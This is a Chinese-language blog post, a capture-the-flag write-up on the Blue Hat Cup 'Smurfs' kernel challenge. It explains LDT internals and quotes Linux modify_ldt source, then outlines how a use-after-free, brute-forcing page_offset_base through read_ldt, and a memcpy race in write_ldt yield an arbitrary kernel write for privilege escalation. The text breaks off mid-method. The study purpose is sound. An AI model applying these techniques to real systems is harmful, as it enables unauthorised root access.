<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="蓝帽杯半决赛 Smurfs复现前言提供了del,add,edit，其中有比较裸的uaf,edit可以编辑前八个字节,但是没有泄露地址的功能，在比赛期间我采用seq_operations的start指针来控制程序流，kernel的地址随机化只有9位，所以采用硬爆的策略打远程，可惜脸黑，爆了两个小时，到比赛结束还是没有爆出来。虽有一定可行性但是正解肯定不是这样，官方解出来看了看发现非常有含金量，遂复现">
<meta property="og:type" content="article">
<meta property="og:title" content="蓝帽杯半决赛 Smurfs复现">
<meta property="og:url" content="http://example.com/2022/08/12/%E8%93%9D%E5%B8%BD%E6%9D%AF%E5%8D%8A%E5%86%B3%E8%B5%9B-Smurfs%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="study">
<meta property="og:description" content="蓝帽杯半决赛 Smurfs复现前言提供了del,add,edit，其中有比较裸的uaf,edit可以编辑前八个字节,但是没有泄露地址的功能，在比赛期间我采用seq_operations的start指针来控制程序流，kernel的地址随机化只有9位，所以采用硬爆的策略打远程，可惜脸黑，爆了两个小时，到比赛结束还是没有爆出来。虽有一定可行性但是正解肯定不是这样，官方解出来看了看发现非常有含金量，遂复现">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="c:/Users/张鹏/AppData/Roaming/Typora/typora-user-images/image-20220812195333645.png">
<meta property="og:image" content="https://ask.qcloudimg.com/http-save/4069933/9r91dw9haq.jpeg?imageView2/2/w/1620">
<meta property="og:image" content="https://ask.qcloudimg.com/http-save/4069933/4icmuda124.jpeg?imageView2/2/w/1620">
<meta property="og:image" content="https://ask.qcloudimg.com/http-save/yehe-1878670/czt9jkhxcl.png?imageView2/2/w/1620">
<meta property="og:image" content="https://ctf-wiki.org/pwn/linux/kernel-mode/defense/isolation/user-kernel/figure/476px-Kernel_page-table_isolation.svg.png">
<meta property="article:published_time" content="2022-08-12T13:57:21.000Z">
<meta property="article:modified_time" content="2022-08-16T14:28:40.008Z">
<meta property="article:author" content="rootzhang">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:/Users/张鹏/AppData/Roaming/Typora/typora-user-images/image-20220812195333645.png">

<link rel="canonical" href="http://example.com/2022/08/12/%E8%93%9D%E5%B8%BD%E6%9D%AF%E5%8D%8A%E5%86%B3%E8%B5%9B-Smurfs%E5%A4%8D%E7%8E%B0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>蓝帽杯半决赛 Smurfs复现 | study</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">study</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/08/12/%E8%93%9D%E5%B8%BD%E6%9D%AF%E5%8D%8A%E5%86%B3%E8%B5%9B-Smurfs%E5%A4%8D%E7%8E%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="rootzhang">
      <meta itemprop="description" content="我的博客">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="study">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          蓝帽杯半决赛 Smurfs复现
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-08-12 21:57:21" itemprop="dateCreated datePublished" datetime="2022-08-12T21:57:21+08:00">2022-08-12</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-08-16 22:28:40" itemprop="dateModified" datetime="2022-08-16T22:28:40+08:00">2022-08-16</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="蓝帽杯半决赛-Smurfs复现"><a href="#蓝帽杯半决赛-Smurfs复现" class="headerlink" title="蓝帽杯半决赛 Smurfs复现"></a>蓝帽杯半决赛 Smurfs复现</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>提供了del,add,edit，其中有比较裸的uaf,edit可以编辑前八个字节,但是没有泄露地址的功能，在比赛期间我采用<code>seq_operations</code>的<code>start</code>指针来控制程序流，kernel的地址随机化只有9位，所以采用硬爆的策略打远程，可惜脸黑，爆了两个小时，到比赛结束还是没有爆出来。虽有一定可行性但是正解肯定不是这样，官方解出来看了看发现非常有含金量，遂复现一波。</p>
<h2 id="相关内核知识学习"><a href="#相关内核知识学习" class="headerlink" title="相关内核知识学习"></a>相关内核知识学习</h2><h3 id="进程ldt"><a href="#进程ldt" class="headerlink" title="进程ldt"></a>进程ldt</h3><p>虽然题目的利用思路和这个关系不是很大，但看都看了就记录一下。</p>
<p>介绍LDT就不得不介绍GDT了，简而言之，GDT是全局描述符表，而LDT是局部描述符表，在kvm的学习中接触过GDT,但是当时不理解为什么加了这个东西为什么就可以实现保护了，在询问<code>Alex</code>学长一波后终于搞懂，他是怎么实现内存保护以及进程位隔离的了。</p>
<p><img src="C:\Users\张鹏\AppData\Roaming\Typora\typora-user-images\image-20220812195333645.png" alt="image-20220812195333645"></p>
<p>一个cpu有一个全局描述符表GDT，GDT相当于一个数组，每一个元素就是一个段描述符，一个段描述符就记录这个段的一些信息，比如段的基地址段的大小之类的，这个数组的地址存储在寄存器<code>GDTR</code>中，然后在段寄存器中就不会记录段的具体信息，而是记录一个段选择子，通过这个段选择子完成对某一个段描述符的索引</p>
<p><img src="https://ask.qcloudimg.com/http-save/4069933/9r91dw9haq.jpeg?imageView2/2/w/1620" alt="img"></p>
<p>段选择子包括三部分，描述索引符，TL,RPL，其中描述索引符就是索引段描述符的，TL有两种可能，0代表在GDT中寻找，1代表在LDT中寻找。</p>
<p>LDT是在保护模式下实现进程间隔离的重要的机制，每个LDT都记录一个进程的段的信息，包括cs,ds,ss之类的，也是由段描述符组成的数组，他是一段内存，也可以看做一个段，所以可以在GDT中用一个描述符去记录他，也有一个寄存器LDTR，不过他不是记录LDT的基地址，而是一个选择子，当段寄存器的TL位是1的话，代表就是LDT选择，CPU会根据LDTR作为一个索引去GDT表中找描述符，找见的描述符就是对应一个LDT地址，然后再用对应的段寄存器的index找到对应的段描述符，可见，进程之间的LDTR不一样，他们的LDT就不一样，段寄存器就不一样，进程间就隔离了，比较形象的描述如下如图。</p>
<p><img src="https://ask.qcloudimg.com/http-save/4069933/4icmuda124.jpeg?imageView2/2/w/1620" alt="img"></p>
<p><img src="https://ask.qcloudimg.com/http-save/yehe-1878670/czt9jkhxcl.png?imageView2/2/w/1620" alt="img"></p>
<h3 id="modify-ldt-系统调用"><a href="#modify-ldt-系统调用" class="headerlink" title="modify_ldt 系统调用"></a>modify_ldt 系统调用</h3><h4 id="ldt-struct"><a href="#ldt-struct" class="headerlink" title="ldt_struct"></a>ldt_struct</h4><p>该结构体是0x10大小的，然后前八个字节是一个指针，通过uaf我们得到这个结构体，然后通过edit可以控制前八个字节，也就是控制<code>entries</code>指针。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">ldt_struct</span> &#123;</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">desc_struct</span>    *<span class="title">entries</span>;</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">int</span>        nr_entries;</span><br><span class="line">    <span class="keyword">int</span>            slot;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>其中<code> struct desc_struct</code>就是一个段描述符</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">desc_struct</span> &#123;</span></span><br><span class="line">    u16    limit0;</span><br><span class="line">    u16    base0;</span><br><span class="line">    u16    base1: <span class="number">8</span>, type: <span class="number">4</span>, s: <span class="number">1</span>, dpl: <span class="number">2</span>, p: <span class="number">1</span>;</span><br><span class="line">    u16    limit1: <span class="number">4</span>, avl: <span class="number">1</span>, l: <span class="number">1</span>, d: <span class="number">1</span>, g: <span class="number">1</span>, base2: <span class="number">8</span>;</span><br><span class="line">&#125; __attribute__((packed));</span><br></pre></td></tr></table></figure>

<h4 id="moddify-ldt系统调用"><a href="#moddify-ldt系统调用" class="headerlink" title="moddify_ldt系统调用"></a>moddify_ldt系统调用</h4><p>可以通过linux提供的<code>modity_ldt</code>来获取或者修改当前进程的LDT</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">SYSCALL_DEFINE3(modify_ldt, <span class="keyword">int</span> , func , <span class="keyword">void</span> __user * , ptr ,</span><br><span class="line">        <span class="keyword">unsigned</span> <span class="keyword">long</span> , bytecount)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">int</span> ret = -ENOSYS;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">switch</span> (func) &#123;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">0</span>:</span><br><span class="line">        ret = read_ldt(ptr, bytecount);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">1</span>:</span><br><span class="line">        ret = write_ldt(ptr, bytecount, <span class="number">1</span>);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">2</span>:</span><br><span class="line">        ret = read_default_ldt(ptr, bytecount);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> <span class="number">0x11</span>:</span><br><span class="line">        ret = write_ldt(ptr, bytecount, <span class="number">0</span>);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> (<span class="keyword">unsigned</span> <span class="keyword">int</span>)ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>moddify_ldt系统调用一共提供了四个功能，参数有三个，fun,ptr,bytecount,<code>ptr</code>是我们传入的结构体指针，结构体为<code>user_desc</code></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">user_desc</span> &#123;</span></span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">int</span>  entry_number;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">int</span>  base_addr;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">int</span>  limit;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">int</span>  seg_32bit:<span class="number">1</span>;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">int</span>  contents:<span class="number">2</span>;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">int</span>  read_exec_only:<span class="number">1</span>;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">int</span>  limit_in_pages:<span class="number">1</span>;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">int</span>  seg_not_present:<span class="number">1</span>;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">int</span>  useable:<span class="number">1</span>;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p><strong>read_ldt</strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">int</span> <span class="title">read_ldt</span><span class="params">(<span class="keyword">void</span> __user *ptr, <span class="keyword">unsigned</span> <span class="keyword">long</span> bytecount)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">mm_struct</span> *<span class="title">mm</span> =</span> current-&gt;mm;</span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> entries_size;</span><br><span class="line"> <span class="keyword">int</span> retval;</span><br><span class="line"></span><br><span class="line"> down_read(&amp;mm-&gt;context.ldt_usr_sem);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (!mm-&gt;context.ldt) &#123;</span><br><span class="line">  retval = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">goto</span> out_unlock;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (bytecount &gt; LDT_ENTRY_SIZE * LDT_ENTRIES)</span><br><span class="line">  bytecount = LDT_ENTRY_SIZE * LDT_ENTRIES;</span><br><span class="line"></span><br><span class="line"> entries_size = mm-&gt;context.ldt-&gt;nr_entries * LDT_ENTRY_SIZE;</span><br><span class="line"> <span class="keyword">if</span> (entries_size &gt; bytecount)</span><br><span class="line">  entries_size = bytecount;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (copy_to_user(ptr, mm-&gt;context.ldt-&gt;entries, entries_size)) &#123;</span><br><span class="line">  retval = -EFAULT;</span><br><span class="line">  <span class="keyword">goto</span> out_unlock;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (entries_size != bytecount) &#123;</span><br><span class="line">  <span class="comment">/* Zero-fill the rest and pretend we read bytecount bytes. */</span></span><br><span class="line">  <span class="keyword">if</span> (clear_user(ptr + entries_size, bytecount - entries_size)) &#123;</span><br><span class="line">   retval = -EFAULT;</span><br><span class="line">   <span class="keyword">goto</span> out_unlock;</span><br><span class="line">  &#125;</span><br><span class="line"> &#125;</span><br><span class="line"> retval = bytecount;</span><br><span class="line"></span><br><span class="line">out_unlock:</span><br><span class="line"> up_read(&amp;mm-&gt;context.ldt_usr_sem);</span><br><span class="line"> <span class="keyword">return</span> retval;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>函数会使用<code>copy_to_user</code>把ldt-&gt;entires的值拷贝到传入的<code>ptr</code>中，就是把这个进程的LDT拷贝到<code>ptr</code>中，如果拷贝不成功，那就会返回-1.我们可以检查返回值判断是否读取成功，也就是可以爆破出heap或者kernel地址。</p>
<p><strong>write_ldt</strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">int</span> <span class="title">write_ldt</span><span class="params">(<span class="keyword">void</span> __user *ptr, <span class="keyword">unsigned</span> <span class="keyword">long</span> bytecount, <span class="keyword">int</span> oldmode)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">mm_struct</span> *<span class="title">mm</span> =</span> current-&gt;mm;</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">ldt_struct</span> *<span class="title">new_ldt</span>, *<span class="title">old_ldt</span>;</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> old_nr_entries, new_nr_entries;</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">user_desc</span> <span class="title">ldt_info</span>;</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">desc_struct</span> <span class="title">ldt</span>;</span></span><br><span class="line"> <span class="keyword">int</span> error;</span><br><span class="line"></span><br><span class="line"> error = -EINVAL;</span><br><span class="line"> <span class="keyword">if</span> (bytecount != <span class="keyword">sizeof</span>(ldt_info))</span><br><span class="line">  <span class="keyword">goto</span> out;</span><br><span class="line"> error = -EFAULT;</span><br><span class="line"> <span class="keyword">if</span> (copy_from_user(&amp;ldt_info, ptr, <span class="keyword">sizeof</span>(ldt_info)))</span><br><span class="line">  <span class="keyword">goto</span> out;</span><br><span class="line"></span><br><span class="line"> error = -EINVAL;</span><br><span class="line"> <span class="keyword">if</span> (ldt_info.entry_number &gt;= LDT_ENTRIES)</span><br><span class="line">  <span class="keyword">goto</span> out;</span><br><span class="line"> <span class="keyword">if</span> (ldt_info.contents == <span class="number">3</span>) &#123;</span><br><span class="line">  <span class="keyword">if</span> (oldmode)</span><br><span class="line">   <span class="keyword">goto</span> out;</span><br><span class="line">  <span class="keyword">if</span> (ldt_info.seg_not_present == <span class="number">0</span>)</span><br><span class="line">   <span class="keyword">goto</span> out;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> ((oldmode &amp;&amp; !ldt_info.base_addr &amp;&amp; !ldt_info.limit) ||</span><br><span class="line">     LDT_empty(&amp;ldt_info)) &#123;</span><br><span class="line">  <span class="comment">/* The user wants to clear the entry. */</span></span><br><span class="line">  <span class="built_in">memset</span>(&amp;ldt, <span class="number">0</span>, <span class="keyword">sizeof</span>(ldt));</span><br><span class="line"> &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">  <span class="keyword">if</span> (!ldt_info.seg_32bit &amp;&amp; !allow_16bit_segments()) &#123;</span><br><span class="line">   error = -EINVAL;</span><br><span class="line">   <span class="keyword">goto</span> out;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  fill_ldt(&amp;ldt, &amp;ldt_info);</span><br><span class="line">  <span class="keyword">if</span> (oldmode)</span><br><span class="line">   ldt.avl = <span class="number">0</span>;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (down_write_killable(&amp;mm-&gt;context.ldt_usr_sem))</span><br><span class="line">  <span class="keyword">return</span> -EINTR;</span><br><span class="line"></span><br><span class="line"> old_ldt       = mm-&gt;context.ldt;</span><br><span class="line"> old_nr_entries = old_ldt ? old_ldt-&gt;nr_entries : <span class="number">0</span>;</span><br><span class="line"> new_nr_entries = max(ldt_info.entry_number + <span class="number">1</span>, old_nr_entries);</span><br><span class="line"></span><br><span class="line"> error = -ENOMEM;</span><br><span class="line"> new_ldt = alloc_ldt_struct(new_nr_entries);</span><br><span class="line"> <span class="keyword">if</span> (!new_ldt)</span><br><span class="line">  <span class="keyword">goto</span> out_unlock;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (old_ldt)</span><br><span class="line">  <span class="built_in">memcpy</span>(new_ldt-&gt;entries, old_ldt-&gt;entries, old_nr_entries * LDT_ENTRY_SIZE);</span><br><span class="line"></span><br><span class="line"> new_ldt-&gt;entries[ldt_info.entry_number] = ldt;</span><br><span class="line"> finalize_ldt_struct(new_ldt);</span><br><span class="line"></span><br><span class="line"> <span class="comment">/*</span></span><br><span class="line"><span class="comment">  * If we are using PTI, map the new LDT into the userspace pagetables.</span></span><br><span class="line"><span class="comment">  * If there is already an LDT, use the other slot so that other CPUs</span></span><br><span class="line"><span class="comment">  * will continue to use the old LDT until install_ldt() switches</span></span><br><span class="line"><span class="comment">  * them over to the new LDT.</span></span><br><span class="line"><span class="comment">  */</span></span><br><span class="line"> error = map_ldt_struct(mm, new_ldt, old_ldt ? !old_ldt-&gt;slot : <span class="number">0</span>);</span><br><span class="line"> <span class="keyword">if</span> (error) &#123;</span><br><span class="line">  <span class="comment">/*</span></span><br><span class="line"><span class="comment">   * This only can fail for the first LDT setup. If an LDT is</span></span><br><span class="line"><span class="comment">   * already installed then the PTE page is already</span></span><br><span class="line"><span class="comment">   * populated. Mop up a half populated page table.</span></span><br><span class="line"><span class="comment">   */</span></span><br><span class="line">  <span class="keyword">if</span> (!WARN_ON_ONCE(old_ldt))</span><br><span class="line">   free_ldt_pgtables(mm);</span><br><span class="line">  free_ldt_struct(new_ldt);</span><br><span class="line">  <span class="keyword">goto</span> out_unlock;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> install_ldt(mm, new_ldt);</span><br><span class="line"> unmap_ldt_struct(mm, old_ldt);</span><br><span class="line"> free_ldt_struct(old_ldt);</span><br><span class="line"> error = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">out_unlock:</span><br><span class="line"> up_write(&amp;mm-&gt;context.ldt_usr_sem);</span><br><span class="line">out:</span><br><span class="line"> <span class="keyword">return</span> error;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以通过这个函数重新申请一个ldt结构体绑定到进程上，我们就可以利用uaf控制这个结构题，然后就可以控制其中的<code>entries</code>了。</p>
<p>这个函数处理可以控制ldt以外还可以完成任意写，观察下面的代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (old_ldt)</span><br><span class="line">    <span class="built_in">memcpy</span>(new_ldt-&gt;entries, old_ldt-&gt;entries, old_nr_entries * LDT_ENTRY_SIZE);</span><br><span class="line"></span><br><span class="line">new_ldt-&gt;entries[ldt_info.entry_number] = ldt;</span><br></pre></td></tr></table></figure>

<p>在<code>memcpy</code>函数中，拷贝的大小是<code>old_nr_entries * LDT_ENTRY_SIZE</code>,其中<code>old_nr_entries</code>的上限和<code>LDT_ENTRY_SIZE</code>大小都有定义</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> LDT_ENTRIES    8192</span></span><br><span class="line"><span class="comment">/* The size of each LDT entry. */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> LDT_ENTRY_SIZE    8</span></span><br></pre></td></tr></table></figure>

<p>可见还是比较大的，然后还没有加锁，那就可以在<code>memcpy</code>拷贝的期间条件竞争修改<code>entries</code>字段，ldt也是我们传入的值，再执行<code>new_ldt-&gt;entries[ldt_info.entry_number] = ldt;</code>就可以完成任意地址写八字节了。</p>
<h2 id="解法一-遍历内存泄露地址修改进程cred完成提权"><a href="#解法一-遍历内存泄露地址修改进程cred完成提权" class="headerlink" title="解法一 遍历内存泄露地址修改进程cred完成提权"></a>解法一 遍历内存泄露地址修改进程cred完成提权</h2><p>有些难。</p>
<h2 id="解法二-遍历内存泄露地址劫持seq-operations-rop提权"><a href="#解法二-遍历内存泄露地址劫持seq-operations-rop提权" class="headerlink" title="解法二 遍历内存泄露地址劫持seq_operations+rop提权"></a>解法二 遍历内存泄露地址劫持seq_operations+rop提权</h2><h3 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h3><p>总的来说就是先利用modify_ldt爆破<code>page_0ffset_base</code>这块的线性地址，这段虚拟地址在<code>ret2dir</code>中就学习到过，是一段连续的虚拟地址，一共有64TB,映射了所有的物理内存，<code>kmalloc</code>的内存申请就是在这里进行的，在不开kaslr的时候，<code>page_offset_base=0xffff888000000000</code>,但是本题开了，所以需要爆破这个的地址，爆破就是利用<code>read_ldt</code>来爆破，</p>
